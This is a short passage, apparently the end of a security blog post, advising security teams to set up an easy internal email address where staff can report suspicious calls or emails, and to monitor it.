By the way, if you’re in the security team and you don’t have a quick and easy way for your staff to report potential cybersecurity problems such as suspicious phone calls or dodgy emails, why not set up an easy-to-remember internal email address today, and get used to monitoring it?

It doesn’t take much encouragement to turn your entire workforce into the eyes and ears of the security team.

After all, when it comes to cybersecurity, an injury to one really is is an injury to all.

---